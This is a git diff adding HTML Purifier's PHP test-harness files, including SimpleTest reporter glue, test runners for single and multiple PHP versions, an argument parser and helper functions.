b/lib/htmlpurifier/tests/PHPT/Reporter/SimpleTest.php @@ -0,0 +1,77 @@ +<?php + +/** + * Proxies results from PHPT_Reporter to SimpleTest's reporter + */ +class PHPT_Reporter_SimpleTest implements PHPT_Reporter +{ + + /** SimpleTest reporter to proxy results to */ + protected $reporter; + + /** @param SimpleTest reporter */ + public function __construct($reporter) { + $this->reporter = $reporter; + } + + // TODO: Figure out what the proper calls should be, since we've given + // each Suite its own UnitTestCase controller + + /** + * Called when the Reporter is started from a PHPT_Suite + * @todo Figure out if Suites can be named + */ + public function onSuiteStart(PHPT_Suite $suite) { + //$this->reporter->paintGroupStart('PHPT Suite', $suite->count()); + } + + /** + * Called when the Reporter is finished in a PHPT_Suite + */ + public function onSuiteEnd(PHPT_Suite $suite) { + //$this->reporter->paintGroupEnd('PHPT Suite'); + } + + /** + * Called when a Case is started + */ + public function onCaseStart(PHPT_Case $case) { + //$this->reporter->paintCaseStart($case->name); + } + + /** + * Called when a Case ends + */ + public function onCaseEnd(PHPT_Case $case) { + //$this->reporter->paintCaseEnd($case->name); + } + + /** + * Called when a Case runs without Exception + */ + public function onCasePass(PHPT_Case $case) { + $this->reporter->paintPass("{$case->name} in {$case->filename}"); + } + + /** + * Called when a PHPT_Case_VetoException is thrown during a Case's run() + */ + public function onCaseSkip(PHPT_Case $case, PHPT_Case_VetoException $veto) { + $this->reporter->paintSkip($veto->getMessage() . ' [' . $case->filename .']'); + } + + /** + * Called when any Exception other than a PHPT_Case_VetoException is encountered + * during a Case's run() + */ + public function onCaseFail(PHPT_Case $case, PHPT_Case_FailureException $failure) { + $this->reporter->paintFail($failure->getReason()); + } + + public function onParserError(Exception $exception) { + $this->reporter->paintException($exception); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/PHPT/Section/PRESKIPIF.php b/lib/htmlpurifier/tests/PHPT/Section/PRESKIPIF.php new file mode 100644 index 000000000..4691c76da --- /dev/null +++ b/lib/htmlpurifier/tests/PHPT/Section/PRESKIPIF.php @@ -0,0 +1,36 @@ +<?php + +class PHPT_Section_PRESKIPIF implements PHPT_Section_RunnableBefore +{ + private $_data = null; + private $_runner_factory = null; + + public function __construct($data) + { + $this->_data = $data; + $this->_runner_factory = new PHPT_CodeRunner_Factory(); + } + + public function run(PHPT_Case $case) + { + // @todo refactor this code into PHPT_Util class as its used in multiple places + $filename = dirname($case->filename) . '/' . basename($case->filename, '.php') . '.skip.php'; + + // @todo refactor to PHPT_CodeRunner + file_put_contents($filename, $this->_data); + $runner = $this->_runner_factory->factory($case); + $runner->ini = ""; + $response = $runner->run($filename)->output; + unlink($filename); + + if (preg_match('/^skip( - (.*))?/', $response, $matches)) { + $message = !empty($matches[2]) ? $matches[2] : ''; + throw new PHPT_Case_VetoException($message); + } + } + + public function getPriority() + { + return -2; + } +} diff --git a/lib/htmlpurifier/tests/common.php b/lib/htmlpurifier/tests/common.php new file mode 100644 index 000000000..223a5bf1f --- /dev/null +++ b/lib/htmlpurifier/tests/common.php @@ -0,0 +1,231 @@ +<?php + +if (!defined('HTMLPurifierTest')) { + echo "Invalid entry point\n"; + exit; +} + +// setup our own autoload, checking for HTMLPurifier library if spl_autoload_register +// is not allowed +function __autoload($class) { + if (!function_exists('spl_autoload_register')) { + if (HTMLPurifier_Bootstrap::autoload($class)) return true; + if (HTMLPurifierExtras::autoload($class)) return true; + } + require str_replace('_', '/', $class) . '.php'; + return true; +} +if (function_exists('spl_autoload_register')) { + spl_autoload_register('__autoload'); +} + +// default settings (protect against register_globals) +$GLOBALS['HTMLPurifierTest'] = array(); +$GLOBALS['HTMLPurifierTest']['PEAR'] = false; // do PEAR tests +$GLOBALS['HTMLPurifierTest']['PHPT'] = true; // do PHPT tests +$GLOBALS['HTMLPurifierTest']['PH5P'] = class_exists('DOMDocument'); + +// default library settings +$simpletest_location = 'simpletest/'; // reasonable guess +$csstidy_location = false; +$versions_to_test = array(); +$php = 'php'; +$phpv = 'phpv'; + +// load configuration +if (file_exists('../conf/test-settings.php')) include '../conf/test-settings.php'; +elseif (file_exists('../test-settings.php')) include '../test-settings.php'; +else { + throw new Exception('Please create a test-settings.php file by copying test-settings.sample.php and configuring accordingly'); +} + +// load SimpleTest +require_once $simpletest_location . 'unit_tester.php'; +require_once $simpletest_location . 'reporter.php'; +require_once $simpletest_location . 'mock_objects.php'; +require_once $simpletest_location . 'xml.php'; +require_once $simpletest_location . 'remote.php'; + +// load CSS Tidy +if ($csstidy_location !== false) { + $old = error_reporting(E_ALL); + require $csstidy_location . 'class.csstidy.php'; + error_reporting($old); +} + +// load PEAR to include path +if ( is_string($GLOBALS['HTMLPurifierTest']['PEAR']) ) { + // if PEAR is true, there's no need to add it to the path + set_include_path($GLOBALS['HTMLPurifierTest']['PEAR'] . PATH_SEPARATOR . + get_include_path()); +} + +// after external libraries are loaded, turn on compile time errors +error_reporting(E_ALL | E_STRICT); + +// initialize extra HTML Purifier libraries +require '../extras/HTMLPurifierExtras.auto.php'; + +// load SimpleTest addon functions +require 'generate_mock_once.func.php'; +require 'path2class.func.php'; + +/** + * Arguments parser, is cli and web agnostic. + * @warning + * There are some quirks about the argument format: + * - Short boolean flags cannot be chained together + * - Only strings, integers and booleans are accepted + * @param $AC + * Arguments array to populate. This takes a simple format of 'argument' + * => default value. Depending on the type of the default value, + * arguments will be typecast accordingly. For example, if + * 'flag' => false is passed, all arguments for that will be cast to + * boolean. Do *not* pass null, as it will not be recognized. + * @param $aliases + * + */ +function htmlpurifier_parse_args(&$AC, $aliases) { + if (empty($_GET) && !empty($_SERVER['argv'])) { + array_shift($_SERVER['argv']); + $o = false; + $bool = false; + $val_is_bool = false; + foreach ($_SERVER['argv'] as $opt) { + if ($o !== false) { + $v = $opt; + } else { + if ($opt === '') continue; + if (strlen($opt) > 2 && strncmp($opt, '--', 2) === 0) { + $o = substr($opt, 2); + } elseif ($opt[0] == '-') { + $o = substr($opt, 1); + } else { + $lopt = strtolower($opt); + if ($bool !== false && ($opt === '0' || $lopt === 'off' || $lopt === 'no')) { + $o = $bool; + $v = false; + $val_is_bool = true; + } elseif (isset($aliases[''])) { + $o = $aliases['']; + } + } + $bool = false; + if (!isset($AC[$o]) || !is_bool($AC[$o])) { + if (strpos($o, '=') === false) { + continue; + } + list($o, $v) = explode('=', $o); + } elseif (!$val_is_bool) { + $v = true; + $bool = $o; + } + $val_is_bool = false; + } + if ($o === false) continue; + htmlpurifier_args($AC, $aliases, $o, $v); + $o = false; + } + } else { + foreach ($_GET as $o => $v) { + if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) { + $v = stripslashes($v); + } + htmlpurifier_args($AC, $aliases, $o, $v); + } + } +} + +/** + * Actually performs assignment to $AC, see htmlpurifier_parse_args() + * @param $AC Arguments array to write to + * @param $aliases Aliases for options + * @param $o Argument name + * @param $v Argument value + */ +function htmlpurifier_args(&$AC, $aliases, $o, $v) { + if (isset($aliases[$o])) $o = $aliases[$o]; + if (!isset($AC[$o])) return; + if (is_string($AC[$o])) $AC[$o] = $v; + if (is_bool($AC[$o])) $AC[$o] = ($v === '') ? true :(bool) $v; + if (is_int($AC[$o])) $AC[$o] = (int) $v; +} + +/** + * Adds a test-class; we use file extension to determine which class to use. + */ +function htmlpurifier_add_test($test, $test_file, $only_phpt = false) { + switch (strrchr($test_file, ".")) { + case '.phpt': + return $test->add(new PHPT_Controller_SimpleTest($test_file)); + case '.php': + require_once $test_file; + return $test->add(path2class($test_file)); + case '.vtest': + return $test->add(new HTMLPurifier_ConfigSchema_ValidatorTestCase($test_file)); + case '.htmlt': + return $test->add(new HTMLPurifier_HTMLT($test_file)); + default: + trigger_error("$test_file is an invalid file for testing", E_USER_ERROR); + } +} + +/** + * Debugging function that prints tokens in a user-friendly manner. + */ +function printTokens($tokens, $index = null) { + $string = '<pre>'; + $generator = new HTMLPurifier_Generator(HTMLPurifier_Config::createDefault(), new HTMLPurifier_Context); + foreach ($tokens as $i => $token) { + if ($index === $i) $string .= '[<strong>'; + $string .= "<sup>$i</sup>"; + $string .= $generator->escape($generator->generateFromToken($token)); + if ($index === $i) $string .= '</strong>]'; + } + $string .= '</pre>'; + echo $string; +} + +/** + * Convenient "insta-fail" test-case to add if any outside things fail + */ +class FailedTest extends UnitTestCase { + protected $msg, $details; + public function __construct($msg, $details = null) { + $this->msg = $msg; + $this->details = $details; + } + public function test() { + $this->fail($this->msg); + if ($this->details) $this->reporter->paintFormattedMessage($this->details); + } +} + +/** + * Flushes all caches, and fatally errors out if there's a problem. + */ +function htmlpurifier_flush($php, $reporter) { + exec($php . ' ../maintenance/flush.php ' . $php . ' 2>&1', $out, $status); + if ($status) { + $test = new FailedTest( + 'maintenance/flush.php returned non-zero exit status', + wordwrap(implode("\n", $out), 80) + ); + $test->run($reporter); + exit(1); + } +} + +/** + * Dumps error queue, useful if there has been a fatal error. + */ +function htmlpurifier_dump_error_queue() { + $context = SimpleTest::getContext(); + $queue = $context->get('SimpleErrorQueue'); + while (($error = $queue->extract()) !== false) { + var_dump($error); + } +} +register_shutdown_function('htmlpurifier_dump_error_queue'); + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/default_load.php b/lib/htmlpurifier/tests/default_load.php new file mode 100644 index 000000000..9b8bfb70c --- /dev/null +++ b/lib/htmlpurifier/tests/default_load.php @@ -0,0 +1,3 @@ +<?php +class default_load { } +echo "Default loaded\n"; diff --git a/lib/htmlpurifier/tests/generate_mock_once.func.php b/lib/htmlpurifier/tests/generate_mock_once.func.php new file mode 100644 index 000000000..3d8710182 --- /dev/null +++ b/lib/htmlpurifier/tests/generate_mock_once.func.php @@ -0,0 +1,11 @@ +<?php + +// since Mocks can't be called from within test files, we need to do +// a little jumping through hoops to generate them +function generate_mock_once($name) { + $mock_name = $name . 'Mock'; + if (class_exists($mock_name, false)) return false; + Mock::generate($name, $mock_name); +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/index.php b/lib/htmlpurifier/tests/index.php new file mode 100644 index 000000000..808b2ce18 --- /dev/null +++ b/lib/htmlpurifier/tests/index.php @@ -0,0 +1,217 @@ +<?php + +/** @file + * Unit tester + * + * The heart and soul of HTML Purifier's correctness; anything and everything + * is tested here! Arguments are specified like --arg=opt, allowed arguments + * are: + * - flush, whether or not to flush definition caches before running + * - standalone, whether or not to test the standalone version + * - file (f), a single file to test + * - xml, whether or not to output XML + * - dry, whether or not to do a dry run + * - type, the type of tests to run, can be 'htmlpurifier', 'configdoc', + * 'fstools', 'htmlt', 'vtest' or 'phpt' + * + * If you're interested in running the test-cases, mosey over to + * ../test-settings.sample.php, copy the file to test-settings.php and follow + * the enclosed instructions. + * + * @warning File setup does not exactly match with autoloader; make sure that + * non-test classes (i.e. classes that are not retrieved using + * $test_files) do not have underscores in their names. + */ + +// HTML Purifier runs error free on E_STRICT, so if code reports +// errors, we want to know about it. +error_reporting(E_ALL | E_STRICT); + +// Because we always want to know about errors, and because SimpleTest +// will notify us about them, logging the errors to stderr is +// counterproductive and in fact the wrong thing when a test case +// exercises an error condition to detect for it. +ini_set('log_errors', false); + +define('HTMLPurifierTest', 1); +define('HTMLPURIFIER_SCHEMA_STRICT', true); // validate schemas +chdir(dirname(__FILE__)); + +$php = 'php'; // for safety +ini_set('memory_limit', '64M'); + +require 'common.php'; +$AC = array(); // parameters +$AC['flush'] = false; +$AC['standalone'] = false; +$AC['file'] = ''; +$AC['xml'] = false; +$AC['dry'] = false; +$AC['php'] = $php; +$AC['help'] = false; +$AC['verbose'] = false; +$AC['txt'] = false; + +$AC['type'] = ''; +$AC['disable-phpt'] = false; +$AC['only-phpt'] = false; // alias for --type=phpt + +$aliases = array( + 'f' => 'file', + 'h' => 'help', + 'v' => 'verbose', +); + +// It's important that this does not call the autoloader. Not a problem +// with a function, but could be if we put this in a class. +htmlpurifier_parse_args($AC, $aliases); + +if ($AC['help']) { +?>HTML Purifier test suite +Allowed options: + --flush + --standalone + --file (-f) HTMLPurifier/NameOfTest.php + --xml + --txt + --dry + --php /path/to/php + --type ( htmlpurifier | configdoc | fstools | htmlt | vtest | phpt ) + --disable-phpt + --verbose (-v) +<?php + exit; +} + +// Disable PHPT tests if they're not enabled +if (!$GLOBALS['HTMLPurifierTest']['PHPT']) { + $AC['disable-phpt'] = true; +} elseif (!$AC['type'] && $AC['only-phpt']) { + // backwards-compat + $AC['type'] = 'phpt'; +} + +if (!SimpleReporter::inCli()) { + // Undo any dangerous parameters + $AC['php'] = $php; +} + +// initialize and load HTML Purifier +// use ?standalone to load the alterative standalone stub +if ($AC['standalone']) { + require '../library/HTMLPurifier.standalone.php'; +} else { + require '../library/HTMLPurifier.path.php'; + require 'HTMLPurifier.includes.php'; +} +require '../library/HTMLPurifier.autoload.php'; +require 'HTMLPurifier/Harness.php'; + +// immediately load external libraries, so we can bail out early if +// they're bad +if ($GLOBALS['HTMLPurifierTest']['PEAR']) { + if ($GLOBALS['HTMLPurifierTest']['Net_IDNA2']) { + require_once 'Net/IDNA2.php'; + } +} + +// Shell-script code is executed + +if ($AC['xml']) { + if (!SimpleReporter::inCli()) header('Content-Type: text/xml;charset=UTF-8'); + $reporter = new XmlReporter(); +} elseif (SimpleReporter::inCli() || $AC['txt']) { + if (!SimpleReporter::inCli()) header('Content-Type: text/plain;charset=UTF-8'); + $reporter = new HTMLPurifier_SimpleTest_TextReporter($AC); +} else { + $reporter = new HTMLPurifier_SimpleTest_Reporter('UTF-8', $AC); +} + +if ($AC['flush']) { + htmlpurifier_flush($AC['php'], $reporter); +} + +// Now, userland code begins to be executed + +// setup special DefinitionCacheFactory decorator +$factory = HTMLPurifier_DefinitionCacheFactory::instance(); +$factory->addDecorator('Memory'); // since we deal with a lot of config objects + +if (!$AC['disable-phpt']) { + $phpt = PHPT_Registry::getInstance(); + $phpt->php = $AC['php']; +} + +// load tests +require 'test_files.php'; + +$FS = new FSTools(); + +// handle test dirs +foreach ($test_dirs as $dir) { + $raw_files = $FS->globr($dir, '*Test.php'); + foreach ($raw_files as $file) { + $file = str_replace('\\', '/', $file); + if (isset($test_dirs_exclude[$file])) continue; + $test_files[] = $file; + } +} + +// handle vtest dirs +foreach ($vtest_dirs as $dir) { + $raw_files = $FS->globr($dir, '*.vtest'); + foreach ($raw_files as $file) { + $test_files[] = str_replace('\\', '/', $file); + } +} + +// handle phpt files +foreach ($phpt_dirs as $dir) { + $phpt_files = $FS->globr($dir, '*.phpt'); + foreach ($phpt_files as $file) { + $test_files[] = str_replace('\\', '/', $file); + } +} + +// handle htmlt dirs +foreach ($htmlt_dirs as $dir) { + $htmlt_files = $FS->globr($dir, '*.htmlt'); + foreach ($htmlt_files as $file) { + $test_files[] = str_replace('\\', '/', $file); + } +} + +array_unique($test_files); +sort($test_files); // for the SELECT +$GLOBALS['HTMLPurifierTest']['Files'] = $test_files; // for the reporter +$test_file_lookup = array_flip($test_files); + +// determine test file +if ($AC['file']) { + if (!isset($test_file_lookup[$AC['file']])) { + echo "Invalid file passed\n"; + exit; + } +} + +if ($AC['file']) { + + $test = new TestSuite($AC['file']); + htmlpurifier_add_test($test, $AC['file']); + +} else { + + $standalone = ''; + if ($AC['standalone']) $standalone = ' (standalone)'; + $test = new TestSuite('All HTML Purifier tests on PHP ' . PHP_VERSION . $standalone); + foreach ($test_files as $test_file) { + htmlpurifier_add_test($test, $test_file); + } + +} + +if ($AC['dry']) $reporter->makeDry(); + +$test->run($reporter); + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/multitest.php b/lib/htmlpurifier/tests/multitest.php new file mode 100644 index 000000000..ef296cdda --- /dev/null +++ b/lib/htmlpurifier/tests/multitest.php @@ -0,0 +1,159 @@ +<?php + +/** @file + * Multiple PHP Versions test + * + * This file tests HTML Purifier in all versions of PHP. Arguments + * are specified like --arg=opt, allowed arguments are: + * - quiet (q), if specified no informative messages are enabled (please use + * this if you're outputting XML) + * - distro, allowed values 'normal' or 'standalone', by default all + * distributions are tested. "--standalone" is a shortcut for + * "--distro=standalone". + * - quick, run only the most recent versions of each release series + * - disable-flush, by default flush is run, this disables it + * - file (f), xml, type: these correspond to the parameters in index.php + * + * @note + * It requires a script called phpv that takes an extra argument (the + * version number of PHP) before all other arguments. Contact me if you'd + * like to set up a similar script. The name of the script can be + * edited with $phpv + * + * @note + * Also, configuration must be set up with a variable called + * $versions_to_test specifying version numbers to pass to $phpv + */ + +define('HTMLPurifierTest', 1); +chdir(dirname(__FILE__)); +$php = 'php'; // for safety + +require_once 'common.php'; + +if (!SimpleReporter::inCli()) { + echo 'Multitest only available from command line'; + exit; +} + +$AC = array(); // parameters +$AC['file'] = ''; +$AC['xml'] = false; +$AC['quiet'] = false; +$AC['php'] = $php; +$AC['disable-phpt'] = false; +$AC['disable-flush'] = false; +$AC['type'] = ''; +$AC['distro'] = ''; // valid values are normal/standalone +$AC['quick'] = false; // run the latest version on each release series +$AC['standalone'] = false; // convenience for --distro=standalone +// Legacy parameters +$AC['only-phpt'] = false; // --type=phpt +$AC['exclude-normal'] = false; // --distro=standalone +$AC['exclude-standalone'] = false; // --distro=normal +$AC['verbose'] = false; +$aliases = array( + 'f' => 'file', + 'q' => 'quiet', + 'v' => 'verbose', +); +htmlpurifier_parse_args($AC, $aliases); + +// Backwards compat extra parsing +if ($AC['only-phpt']) { + $AC['type'] = 'phpt'; +} +if ($AC['exclude-normal']) $AC['distro'] = 'standalone'; +elseif ($AC['exclude-standalone']) $AC['distro'] = 'normal'; +elseif ($AC['standalone']) $AC['distro'] = 'standalone'; + +if ($AC['xml']) { + $reporter = new XmlReporter(); +} else { + $reporter = new HTMLPurifier_SimpleTest_TextReporter($AC); +} + +// Regenerate any necessary files +if (!$AC['disable-flush']) htmlpurifier_flush($AC['php'], $reporter); + +$file_arg = ''; +require 'test_files.php'; +if ($AC['file']) { + $test_files_lookup = array_flip($test_files); + if (isset($test_files_lookup[$AC['file']])) { + $file_arg = '--file=' . $AC['file']; + } else { + throw new Exception("Invalid file passed"); + } +} +// This allows us to get out of having to do dry runs. +$size = count($test_files); + +$type_arg = ''; +if ($AC['type']) $type_arg = '--type=' . $AC['type']; + +if ($AC['quick']) { + $seriesArray = array(); + foreach ($versions_to_test as $version) { + $series = substr($version, 0, strpos($version, '.', strpos($version, '.') + 1)); + if (!isset($seriesArray[$series])) { + $seriesArray[$series] = $version; + continue; + } + if (version_compare($version, $seriesArray[$series], '>')) { + $seriesArray[$series] = $version; + } + } + $versions_to_test = array_values($seriesArray); +} + +// Setup the test +$test = new TestSuite('HTML Purifier Multiple Versions Test'); +foreach ($versions_to_test as $version) { + // Support for arbitrarily forcing flushes by wrapping the suspect + // version name in an array() + $flush_arg = ''; + if (is_array($version)) { + $version = $version[0]; + $flush_arg = '--flush'; + } + if ($AC['type'] !== 'phpt') { + $break = true; + switch ($AC['distro']) { + case '': + $break = false; + case 'normal': + $test->add( + new CliTestCase( + "$phpv $version index.php --xml $flush_arg $type_arg --disable-phpt $file_arg", + $AC['quiet'], $size + ) + ); + if ($break) break; + case 'standalone': + $test->add( + new CliTestCase( + "$phpv $version index.php --xml $flush_arg $type_arg --standalone --disable-phpt $file_arg", + $AC['quiet'], $size + ) + ); + if ($break) break; + } + } + if (!$AC['disable-phpt'] && (!$AC['type'] || $AC['type'] == 'phpt')) { + $test->add( + new CliTestCase( + $AC['php'] . " index.php --xml --php \"$phpv $version\" --type=phpt", + $AC['quiet'], $size + ) + ); + } +} + +// This is the HTML Purifier website's test XML file. We could +// add more websites, i.e. more configurations to test. +// $test->add(new RemoteTestCase('http://htmlpurifier.org/dev/tests/?xml=1', 'http://htmlpurifier.org/dev/tests/?xml=1&dry=1&flush=1')); + +$test->run($reporter); + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/path2class.func.php b/lib/htmlpurifier/tests/path2class.func.php new file mode 100644 index 000000000..95a3a95ae --- /dev/null +++ b/lib/htmlpurifier/tests/path2class.func.php @@ -0,0 +1,14 @@ +<?php + +function path2class($path) { + $temp = $path; + $temp = str_replace('./', '', $temp); // remove leading './' + $temp = str_replace('.\\', '', $temp); // remove leading '.\' + $temp = str_replace('\\', '_', $temp); // normalize \ to _ + $temp = str_replace('/', '_', $temp); // normalize / to _ + while(strpos($temp, '__') !== false) $temp = str_replace('__', '_', $temp); + $temp = str_replace('.php', '', $temp); + return $temp; +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/test_files.php b/lib/htmlpurifier/tests/test_files.php new file mode 100644 index 000000000..d2b86cdb4 --- /dev/null +++ b/lib/htmlpurifier/tests/test_files.php @@ -0,0 +1,45 @@ +<?php + +if (!defined('HTMLPurifierTest')) exit; + +// These arrays are defined by this file and can be relied upon. +$test_files = array(); +$test_dirs = array(); +$test_dirs_exclude = array(); +$vtest_dirs = array(); +$htmlt_dirs = array(); +$phpt_dirs = array(); + +$break = true; +switch ($AC['type']) { + case '': + $break = false; + case 'htmlpurifier': + $test_dirs[] = 'HTMLPurifier'; + $test_files[] = 'HTMLPurifierTest.php'; + $test_dirs_exclude['HTMLPurifier/Filter/ExtractStyleBlocksTest.php'] = true; + if ($csstidy_location) { + $test_files[] = 'HTMLPurifier/Filter/ExtractStyleBlocksTest.php'; + } + if ($break) break; + case 'configdoc': + if (version_compare(PHP_VERSION, '5.2', '>=')) { + // $test_dirs[] = 'ConfigDoc'; // no test files currently! + } + if ($break) break; + case 'fstools': + $test_dirs[] = 'FSTools'; + case 'htmlt': + $htmlt_dirs[] = 'HTMLPurifier/HTMLT'; + if ($break) break; + case 'vtest': + $vtest_dirs[] = 'HTMLPurifier/ConfigSchema/Validator'; + if ($break) break; + + case 'phpt': + if (!$AC['disable-phpt'] && version_compare(PHP_VERSION, '5.2', '>=')) { + $phpt_dirs[] = 'HTMLPurifier/PHPT'; + } +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/tests/tmp/README b/lib/htmlpurifier/tests/tmp/README new file mode 100644 index 000000000..2e35c1c3d --- /dev/null +++ b/lib/htmlpurifier/tests/tmp/README @@ -0,0 +1,3 @@ +This is a dummy file to prevent Git from ignoring this empty directory. + + vim: et sw=4 sts=4 |